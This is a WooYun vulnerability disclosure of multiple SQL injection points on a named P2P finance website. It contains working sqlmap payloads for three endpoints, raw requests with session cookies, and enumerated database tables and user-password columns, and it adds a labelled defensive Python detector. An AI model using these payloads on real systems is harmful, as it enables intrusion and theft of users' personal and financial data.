Vulnerability summary

Defect ID: wooyun-2015-0157945

Title: Multiple SQL injection vulnerabilities in the Jiuli Renren (玖利人人) internet finance platform

Affected vendor: Shenyang Zhuoming Information Consulting Co., Ltd. (沈阳卓铭信息咨询有限公司)

Author: 路人甲

Submitted: 2015-12-05 02:28

Fix time: 2016-01-19 02:30

Disclosed: 2016-01-19 02:30

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-19: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

SQL injection

Detailed description:

This test only demonstrates that the vulnerability exists.
The SQL injection leads to leakage of user data.
There are multiple injection points:
1. http://www.9libank.com/fund/index.html
Vulnerable parameters:
hid_da1
hid_da2
hid_xiao1
hid_xiao2
val
GET injection; sqlmap payloads:

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/-4599' OR 8993=8993 AND 'SHDH'='SHDH'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))UCLy) AND 'WUvq'='WUvq'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x6759616158536f74456f,0x7171786271),NULL,NULL-- 'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
Parameter: #2* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/-8020' OR 3079=3079-- /&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://www.9libank.com:80/fund/index.html?hid_da1=all&hid_da2=if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7071,0x4854584248506446544d,0x7171786271),NULL,NULL-- /&hid_xiao1=15&hid_xiao2=365&slt=yes&sort=desc&type=2&val=max_interest
---


2. http://www.9libank.com/member/common/checkmobile.html
Vulnerable parameter: mobile
POST injection

POST /member/common/checkmobile.html HTTP/1.1
Content-Length: 239
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.9libank.com/
Cookie: think_template=default; PHPSESSID=6f135ptk62kco1ogstkl2n3ii7; Hm_lvt_01daed71e5cc3567071149df8c9dc80d=1449118912,1449118917,1449118944,1449118971; Hm_lpvt_01daed71e5cc3567071149df8c9dc80d=1449118971; HMACCOUNT=8132A08E5C9DF6EB; BAIDUID=475C5A26242ACC9DE9D6E25399C38274:FG=1
Host: www.9libank.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
mobile=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&note=1&note_code=94102&__hash__=0bc8ddaa6a2b3e66fab58a36a092aa87_319aa6668263d83b1fac784cc6b28e59


3. http://www.9libank.com/pay/fundcart.html
Vulnerable parameter: borrow_id
Injection type: POST injection

POST /pay/fundcart.html HTTP/1.1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.9libank.com/
Cookie: think_template=default; PHPSESSID=6f135ptk62kco1ogstkl2n3ii7; Hm_lvt_01daed71e5cc3567071149df8c9dc80d=1449118912,1449118917,1449118944,1449118971; Hm_lpvt_01daed71e5cc3567071149df8c9dc80d=1449118971; HMACCOUNT=8132A08E5C9DF6EB; BAIDUID=475C5A26242ACC9DE9D6E25399C38274:FG=1
Host: www.9libank.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
borrow_id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&investor_capital=e
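All three injection points above carry the same sqlmap payload shapes (the if(now()=sysdate(),sleep(0),0) heuristic probe with XOR wrappers, OR n=n tautologies, SLEEP() delays, UNION ALL SELECT NULL column probes). As an added defender-side example that is not part of the original report, the following Python detector URL-decodes request parameters and flags those shapes; the sample requests are constructed from the endpoints and parameter names above, and the indicator names are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Indicator patterns derived from the payload shapes in the report above:
# sqlmap's heuristic probe if(now()=sysdate(),sleep(0),0) with XOR wrappers,
# the "OR 8993=8993" tautology, time-based SLEEP(5), the "UNION ALL SELECT
# NULL" column probe and SQL comment terminators. Names are our own.
PATTERNS = {
    "heuristic_probe": re.compile(r"if\s*\(\s*now\(\)\s*=\s*sysdate\(\)", re.I),
    "xor_wrapper": re.compile(r"\bXOR\s*\(", re.I),
    "boolean_tautology": re.compile(r"\b(OR|AND)\s+(\d+)\s*=\s*\2\b", re.I),
    # sleep(0) is only the probe; a non-zero delay is the real time-based test
    "time_based": re.compile(r"\bSLEEP\s*\(\s*[1-9]\d*\s*\)", re.I),
    "union_null": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "comment_terminator": re.compile(r"(--\s|/\*|\*/)"),
}

def decode_params(query_or_body: str) -> dict:
    # Split a query string or form body into URL-decoded name/value pairs
    return dict(parse_qsl(query_or_body, keep_blank_values=True))

def scan_request(method: str, target: str, body: str = "") -> list:
    """Return one finding per parameter whose decoded value hits a pattern."""
    url = urlsplit(target)
    params = decode_params(url.query)
    if method == "POST":
        params.update(decode_params(body))
    findings = []
    for name, value in params.items():
        hits = [label for label, rx in PATTERNS.items() if rx.search(value)]
        if hits:
            findings.append({"path": url.path, "param": name, "indicators": hits})
    return findings

# Constructed sample requests modelled on the report's three injection
# points, plus a benign request to the same endpoint as a baseline.
SAMPLE_REQUESTS = [
    ("GET", "/fund/index.html?hid_da1=all&hid_da2=if(now()%3Dsysdate()%2Csleep(0)%2C0)"
            "/-4599'%20OR%208993%3D8993%20AND%20'SHDH'%3D'SHDH'XOR(if(now()%3Dsysdate()"
            "%2Csleep(0)%2C0))OR'&hid_xiao1=15&hid_xiao2=365&val=max_interest", ""),
    ("POST", "/member/common/checkmobile.html",
     "mobile=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)"
     "%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&note=1&note_code=94102"),
    ("POST", "/pay/fundcart.html",
     "borrow_id='%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20&investor_capital=e"),
    ("POST", "/member/common/checkmobile.html", "mobile=13800000000&note=1"),
]

def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Flatten findings for a batch of (method, target, body) requests."""
    return [f for req in requests for f in scan_request(*req)]
```

The benign fourth request produces no finding, which is the false-positive check a WAF or log rule should pass before the pattern set is deployed.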

Proof of vulnerability:

Database information:
Database: p2p
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| lzh_member_money | 13092 |
| lzh_members | 9656 |
| lzh_member_fuyou | 5425 |
| lzh_area | 3412 |
| lzh_auser_dologs | 1034 |
| lzh_inner_msg | 743 |
| lzh_member_info | 352 |
| lzh_transfer_borrow_investor | 331 |
| lzh_member_address | 293 |
| lzh_note_log | 263 |
| lzh_transfer_privilege_detail | 238 |
| lzh_xunbao_huojiang | 205 |
| lzh_tqbj_getuser | 122 |
| lzh_article | 92 |
| lzh_xunbao_choujiang | 83 |
| lzh_cellnumber | 29 |
| lzh_member_credit | 19 |
| lzh_member_credit_company | 19 |
| lzh_member_credit_info | 19 |
| lzh_credit | 7 |
| lzh_transfer_borrow_info | 7 |
| lzh_xunbao_jiangpin | 5 |
| lzh_acl | 4 |
| lzh_ausers | 4 |
| lzh_global | 4 |
| lzh_tqbj_gift | 4 |
| lzh_article_category | 3 |
+-------------------------------+---------+


Database: p2p
Table: lzh_members
[28 columns]
+-----------------+------------------------+
| Column | Type |
+-----------------+------------------------+
| active_integral | int(15) |
| credits | int(10) |
| customer_id | int(10) unsigned |
| customer_name | varchar(20) |
| id | int(10) unsigned |
| idcard | varchar(55) |
| integral | int(15) |
| invest_credits | decimal(15,2) unsigned |
| is_ban | int(11) |
| is_borrow | int(2) |
| is_transfer | int(2) |
| is_vip | tinyint(3) |
| last_log_ip | char(15) |
| last_log_time | int(10) |
| pin_pass | char(32) |
| recommend_id | int(10) unsigned |
| recommend_phone | varchar(13) |
| reg_ip | varchar(15) |
| reg_time | int(10) unsigned |
| reward_money | decimal(15,2) |
| true_name | varchar(55) |
| user_code | varchar(28) |
| user_email | varchar(50) |
| user_leve | tinyint(4) unsigned |
| user_name | varchar(50) |
| user_pass | char(32) |
| user_phone | varchar(13) |
| user_type | tinyint(3) unsigned |
+-----------------+------------------------+


The database can be dumped in full.

Fix recommendation:

Apply global filtering to the affected parameters.

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond.